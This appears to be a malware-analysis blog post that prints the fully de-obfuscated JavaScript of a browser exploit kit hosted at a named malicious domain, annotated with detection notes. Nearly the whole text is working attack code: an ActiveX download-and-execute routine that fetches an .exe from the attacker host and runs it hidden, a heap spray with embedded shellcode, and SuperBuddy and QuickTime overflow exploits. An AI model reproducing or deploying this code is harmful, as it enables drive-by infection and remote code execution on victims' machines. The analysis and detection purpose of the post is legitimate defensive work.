bdydcketn.com/cgi-bin/index.cgi?mentat

The obfuscation method has been improved to defeat eval() overloading (the usual trick of redefining eval() to capture the decoded script).
See https://s3cwatch.wordpress.com/de-obfuscate-javascript-2/ for the de-obfuscation walkthrough.

The final decoded JS is as follows:

/**
 * Builds a pseudo-random string of pS1TKjZw characters drawn from a
 * lowercase-alphanumeric alphabet (note the alphabet skips the letter 'j').
 * Uses Math.random(), so the result is not cryptographically random.
 * In this sample it is only used by UtaReQBl to choose the name of the
 * dropped file, which is why the dropped filename varies per victim and
 * cannot be matched by a fixed filename indicator.
 */
function O67OIL_S(pS1TKjZw)
{
var Tc6cGkJB = "abcdefghiklmnopqrstuvwxyz0123456789";
var kUUULHYt = '';
for (var hDfiZeOa=0; hDfiZeOa<pS1TKjZw; hDfiZeOa++) {
// Pick one alphabet index and append the single character at it.
var jsUi5gXl = Math.floor(Math.random() * Tc6cGkJB.length);
kUUULHYt += Tc6cGkJB.substring(jsUi5gXl, jsUi5gXl+1);
}

return kUUULHYt;
}

/**
 * Tries to instantiate a COM object named U83q7uSO through the host object
 * uWvOWnll (the <object> element created in YtbTDiYx), using six different
 * CreateObject/GetObject call shapes in turn.
 * Each attempt is built as a string and run through eval(); failures are
 * swallowed and the next shape is tried. Returns the first object obtained,
 * or null if every attempt threw.
 * For detection: the combination of eval() over string-built CreateObject/
 * GetObject calls is a recognisable pattern in this family; the assignment
 * target is the local B2k7pLyj, reached through the string prefix loDdwyvv.
 */
function g_KRRWml(uWvOWnll, U83q7uSO)
{
var B2k7pLyj = null;
// Prefix shared by every attempt: "B2k7pLyj=uWvOWnll." + one call below.
var loDdwyvv = 'B2k7pLyj=uWvOWnll.';
var UIT35FaR = new Array(
'CreateObject(U83q7uSO)',
'CreateObject(U83q7uSO, "")',
'CreateObject(U83q7uSO, "", "")',
'GetObject("", U83q7uSO)',
'GetObject(U83q7uSO, "")',
'GetObject(U83q7uSO)'
);

var CEpnV6hW=0;

// Stop at the first shape that leaves B2k7pLyj non-null.
while(!B2k7pLyj && CEpnV6hW < UIT35FaR.length) {
try {
eval(loDdwyvv+UIT35FaR[CEpnV6hW]);
} catch(e) { }

CEpnV6hW++;
}

return B2k7pLyj;
}

/**
 * Performs a synchronous GET of LQz9pLDR through the XMLHTTP-style object
 * RJ8oL8br and returns its responseBody (the raw payload bytes).
 * Returns 0 when open() or send() throws, which the caller (UtaReQBl) uses
 * as the "no payload" signal. Note the third argument `false` makes the
 * request blocking.
 */
function q_huKEGP(RJ8oL8br, LQz9pLDR)
{

try {
RJ8oL8br.open("GET", LQz9pLDR, false);
RJ8oL8br.send(null);

} catch(e) { return 0; }

return RJ8oL8br.responseBody;
}

<doc_update>

/**
 * Download-and-execute step of the sample.
 *  - HieKcOMz: URL to fetch (KXJKun7V plus a loop index, see YtbTDiYx)
 *  - RJ8oL8br: XMLHTTP object used by q_huKEGP
 *  - zaGikQAq: ADODB.Stream object used by XkTvXDCJ
 *  - VOgWb3Cn: shell object (WScript.Shell or Shell.Application)
 *  - pADpe5al: 0 selects VOgWb3Cn.Run, anything else VOgWb3Cn.ShellExecute
 * The payload is written to c:\<6 random chars>.exe and then launched with a
 * hidden window (the trailing 0 argument in both calls).
 * Returns 1 if a launch call did not throw, otherwise 0.
 * Host-side indicators: a new *.exe directly under c:\ written by the
 * browser process, followed by a child process started from that path.
 */
function UtaReQBl(HieKcOMz, RJ8oL8br, zaGikQAq, VOgWb3Cn, pADpe5al)
{
var TAESYazX = 0;
var ezLtKohw = q_huKEGP(RJ8oL8br, HieKcOMz);

// q_huKEGP returns 0 when the download failed.
if (ezLtKohw != 0) {
var gOl2BTRU = "c:\\"+O67OIL_S(6)+".exe";

// Only launch if the file was actually written.
if (XkTvXDCJ(zaGikQAq, gOl2BTRU, ezLtKohw) == 1) {
if (pADpe5al == 0) {
try {
VOgWb3Cn.Run(gOl2BTRU, 0);
TAESYazX = 1;
} catch(e) { }
} else {
try {
VOgWb3Cn.ShellExecute(gOl2BTRU, "", "", "open", 0);
TAESYazX = 1;
} catch(e) { }
}
}
}

return TAESYazX;
}

/**
 * First exploitation path: abuse a COM control to obtain scripting objects
 * and drop the payload, without any memory corruption.
 * Steps visible here:
 *  1. create an <object> element with the hard-coded classid below
 *     (NOTE(review): commonly associated with an MDAC/RDS control — confirm
 *     against a classid reference before relying on that attribution);
 *  2. use g_KRRWml on it to obtain an XMLHTTP object (three variants tried),
 *     ADODB.Stream, and a shell object (WScript.Shell, else Shell.Application);
 *  3. if all three were obtained, call UtaReQBl once (UFCXmdEO is 1) with
 *     the payload URL KXJKun7V suffixed by the loop index "0".
 * Returns 1 if the payload was launched, otherwise 0. All exceptions are
 * swallowed so a failed attempt silently falls through to the next path.
 */
function YtbTDiYx()
{
var LtzS6jMJ = 0;
var UFCXmdEO = 1;
var KXJKun7V = "http://bdydcketn.com/cgi-bin/index.cgi?8457cb140100f06002f7f5ea65060000000002ccbdf3c90003040900000000020";
// [0] = XMLHTTP, [1] = ADODB.Stream, [2] = shell object
var eLJLMEPW = new Array(null, null, null);

try {
// Becomes 1 when Shell.Application is used instead of WScript.Shell,
// which switches UtaReQBl from Run() to ShellExecute().
var Bc74I86U = 0;
var dlx54cQH = document.createElement("object");
dlx54cQH.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (dlx54cQH) {
eLJLMEPW[0] = g_KRRWml(dlx54cQH, "msxml2.XMLHTTP");
if (!eLJLMEPW[0])
eLJLMEPW[0] = g_KRRWml(dlx54cQH, "Microsoft.XMLHTTP");

if (!eLJLMEPW[0])
eLJLMEPW[0] = g_KRRWml(dlx54cQH, "MSXML2.ServerXMLHTTP");

eLJLMEPW[1] = g_KRRWml(dlx54cQH, "ADODB.Stream");

eLJLMEPW[2] = g_KRRWml(dlx54cQH, "WScript.Shell");

if (!eLJLMEPW[2]) {
eLJLMEPW[2] = g_KRRWml(dlx54cQH, "Shell.Application");
if (eLJLMEPW[2]) Bc74I86U = 1;
}
}

if (eLJLMEPW[0] && eLJLMEPW[1] && eLJLMEPW[2]) {
for(var LfrFmb6q=0;LfrFmb6q<UFCXmdEO;LfrFmb6q++) {
var rNTUvx7f = UtaReQBl(KXJKun7V+LfrFmb6q.toString(), eLJLMEPW[0], eLJLMEPW[1], eLJLMEPW[2], Bc74I86U);

// Keep the first successful result; later iterations cannot clear it.
if (!LtzS6jMJ)
LtzS6jMJ = rNTUvx7f;
}
}

} catch(e) {}

return LtzS6jMJ;
}

/**
 * Sets tracking cookies "id" (from m7MaRRjU) and "addt" (from og273Ccz) on
 * the current document, each with path=/ and an expiry 120000 days ahead.
 * Either cookie is skipped when its argument is falsy. The callers pass a
 * single numeric argument (Sjifmt_v(9) in OvYFIyVw, Sjifmt_v(6) in nNknR84g),
 * so in practice only "id" is written and it records which exploit path ran.
 * The "id=<n>" cookie is therefore a useful indicator that one of these
 * attempts reached the browser. Errors are swallowed.
 */
function Sjifmt_v(m7MaRRjU, og273Ccz)
{
try {

var bt8N3Pdz = new Date();
bt8N3Pdz.setDate(bt8N3Pdz.getDate() + 120000);

if (m7MaRRjU) {
document.cookie =
"id=" + m7MaRRjU +
"; path=/" +
"; expires=" + bt8N3Pdz.toGMTString();
}

if (og273Ccz) {
document.cookie =
"addt=" + og273Ccz +
"; path=/" +
"; expires=" + bt8N3Pdz.toGMTString();
}

} catch(e) {
}
}

// Global array filled by CkIZS6Ul with the spray blocks (padding + shellcode);
// kept global so the blocks stay referenced while the exploit runs.
var f80dryHg = new Array();
// Set to 1 by CkIZS6Ul after the first spray so it is only performed once.
var Zr5u7htF = 0;

/**
 * Self-rescheduling timer started by CkIZS6Ul: runs every 100 ms and does
 * nothing but assign f80dryHg to itself. The self-assignment has no effect;
 * presumably the intent is to keep the spray array live/referenced — verify,
 * as this is inferred from usage rather than shown here.
 */
function p78sArRj()
{
f80dryHg = f80dryHg;
setTimeout(p78sArRj, 100);
}

/**
 * Grows QeB2OcFI by repeated self-concatenation until its UTF-16 byte size
 * (length*2) reaches a7_qIAMV, then trims it to a7_qIAMV/2 characters, i.e.
 * a7_qIAMV bytes. substring() truncates a fractional end index.
 * Used by CkIZS6Ul to build the padding in front of the shellcode.
 */
function sq5fMuoL(QeB2OcFI, a7_qIAMV)
{
while (QeB2OcFI.length*2<a7_qIAMV)
QeB2OcFI += QeB2OcFI;

QeB2OcFI = QeB2OcFI.substring(0,a7_qIAMV/2);
return QeB2OcFI;
}

/**
 * Heap spray shared by the two memory-corruption paths (OvYFIyVw, nNknR84g).
 * Runs only once (guarded by Zr5u7htF). Each block in f80dryHg is a padding
 * string of 0x0c0c bytes followed by the shellcode pHxme6qt; the block size
 * is chosen so that padding + shellcode + 0x38 equals 0x400000 bytes, and
 * enough blocks are allocated to cover the address 0x0c0c0c0c (LD7rcyEm),
 * the same value the callers pass as the controlled pointer.
 * The shellcode string begins with a %u9090 NOP sled. Returns 0.
 * A large array of identical multi-megabyte strings allocated from script
 * is the observable behaviour a sandbox or browser-side monitor can flag.
 */
function CkIZS6Ul()
{
if (!Zr5u7htF) {
var LD7rcyEm = 0x0c0c0c0c;
var pHxme6qt = unescape("%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%uc583%ub914%u0190%u0000%u42b0%u4530%u4500%u7549%uebf9%ud200%ud2d2%ud2d2%ud2d2%uabd2%u42be%u4242%u261d%u72e3%u4242%u3a42%uc94e%u4e02%u32c9%uef5e%u2ac9%ua94a%uc94b%u7602%u02cf%uc93e%u7e2a%ub5c9%u4628%uaa1b%u42cd%u4242%ubba0%u2d2a%u422c%u2a42%u3037%u2f2e%ubd16%uc954%uaaaa%u423b%u4242%u95c9%uc205%u427d%ub837%u1505%uc205%u427d%ub837%uadc9%u711d%uc38b%u46ae%u4243%uc942%u139e%u1110%u462a%u4243%ubd42%u4e14%u1b18%u1013%u40c9%u0111%u79c2%u3742%uc3b8%ube39%u276c%u273a%u4137%ua9c1%ucb4a%u8541%u4601%u276c%u273a%u0184%u424a%uc819%u4683%uca72%u4207%u8271%u1212%u1511%ubd12%u5214%ubac1%u3742%u2844%u1143%u14bd%u1846%uc11b%u4680%uc203%u4278%uf637%u14bd%u134a%uc914%u7e37%u36c9%u3a6c%ub741%uc914%u6234%ub741%u8b71%u030b%u41ef%u7187%u4d99%u52fc%u9478%u4a36%u8983%u414f%u0298%ub3a9%u5d79%ua537%uc91c%u661c%u9f41%uc924%u094e%u1cc9%u415e%uc99f%uc946%u8741%u1ce9%u811b%ubdaa%ubdbc%uccbd%u4c0c%udaae%uc8bc%u3c4c%ua09a%u7131%uc888%u7419%u6d58%u1332%u0512%u4209%u362a%u3236%u6d78%u206d%u3b26%u2126%u2729%u2c36%u216c%u2f2d%u216d%u2b25%u206f%u2c2b%u2b6d%u262c%u3a27%u216c%u2b25%u7a7d%u7776%u2175%u7320%u7276%u7273%u2472%u7472%u7272%u2470%u2475%u2777%u7423%u7277%u7274%u7272%u7272%u7272%u7272%u2170%u2021%u2426%u2171%u727b%u7272%u7271%u7276%u727b%u7272%u7272%u7272%u7272%u727a%u0042");
// Target block size in bytes.
var HBy2dCNo = 0x400000;
// Shellcode size in bytes (two bytes per UTF-16 unit).
var Ei0FS4qV = pHxme6qt.length * 2;
// Padding size so that padding + shellcode + 0x38 fills one block.
var a7_qIAMV = HBy2dCNo - (Ei0FS4qV+0x38);
var QeB2OcFI = unescape("%u0c0c%u0c0c");

QeB2OcFI = sq5fMuoL(QeB2OcFI,a7_qIAMV);
// Number of blocks needed to reach LD7rcyEm, assuming they are laid out
// contiguously from 0x400000 upward.
var vgdtraWv = (LD7rcyEm - 0x400000)/HBy2dCNo;

for (var vTHkiftk=0;vTHkiftk<vgdtraWv;vTHkiftk++) {
f80dryHg[vTHkiftk] = QeB2OcFI + pHxme6qt;
}

Zr5u7htF = 1;
p78sArRj();
}

return 0;
}

/**
 * Second exploitation path: instantiate the 'Sb.SuperBuddy' ActiveX control,
 * perform the heap spray, set the "id=9" cookie, then call LinkSBIcons with
 * 0x0c0c0c0c — the address the spray was sized to cover. Everything is inside
 * a try/catch, so a missing control or a kill-bitted one simply returns 0.
 * Always returns 0; the caller therefore falls through to nNknR84g.
 */
function OvYFIyVw() {

try {
var lg0F974W = new ActiveXObject('Sb.SuperBuddy');

if (lg0F974W) {
CkIZS6Ul();
Sjifmt_v(9);
lg0F974W.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

/**
 * Third exploitation path: check for the "QuickTime.QuickTime.4" ActiveX
 * control, perform the heap spray, then inject an <object> whose "qtnext1"
 * parameter holds an overlong rtsp:// URL built from 803 'A' bytes followed
 * by twelve 0x0c bytes (matching the spray address 0x0c0c0c0c). The "src"
 * parameter points back at the same bdydcketn.com CGI. Sets the "id=6"
 * cookie just before appending the element to document.body.
 * Always returns 0. Note `t6u3tEIn = 0;` is assigned without `var`, so it
 * becomes an implicit global; the commented-out block at the end of the file
 * reads document.t6u3tEIn, so this looks like a leftover.
 */
function nNknR84g()
{
try {
var if7Fs_5L = new ActiveXObject("QuickTime.QuickTime.4");

if (if7Fs_5L) {
CkIZS6Ul();
var dVnvdJiz = "";
// 200 * "AAAA" + "AAA" = 803 filler characters.
for(var njQYrL3J=0;njQYrL3J<200;njQYrL3J++) {
dVnvdJiz += "AAAA";
}

dVnvdJiz += "AAA";

// Then 3 * 4 = 12 bytes of 0x0c.
for(var njQYrL3J=0;njQYrL3J<3;njQYrL3J++) {
dVnvdJiz += "\x0c\x0c\x0c\x0c";
}

var EuIHRPqG =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://bdydcketn.com/cgi-bin/index.cgi?8457cb140100f06001f7f5ea65060000000002ccbdf3c9000304090000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://AXDOF:' + dVnvdJiz +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

t6u3tEIn = 0;
var Mx38Q5Cx = document.createElement("div");
Mx38Q5Cx.innerHTML = EuIHRPqG;
Sjifmt_v(6);
document.body.appendChild(Mx38Q5Cx);

}
} catch(e) {
}

return 0;
}
// Entry point: the three paths are tried in order and short-circuit on the
// first truthy result. Only YtbTDiYx can return 1; OvYFIyVw and nNknR84g
// always return 0, so all three may run. Both branches assign the same
// value, so the if/else is dead logic (the redirect target is only read by
// the commented-out timer below).
if (YtbTDiYx() || OvYFIyVw() || nNknR84g()
) {
document.IGsrplJc = 'about:blank';
} else {
document.IGsrplJc = 'about:blank';
}

/*setTimeout(function() {
if (document.t6u3tEIn && document.J23g5cfS && document.jntefJDI) {
setTimeout("window.location = '" + document.IGsrplJc + "';", 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/

The VirusTotal (VT) analysis of the payload fetched from KXJKun7V is here
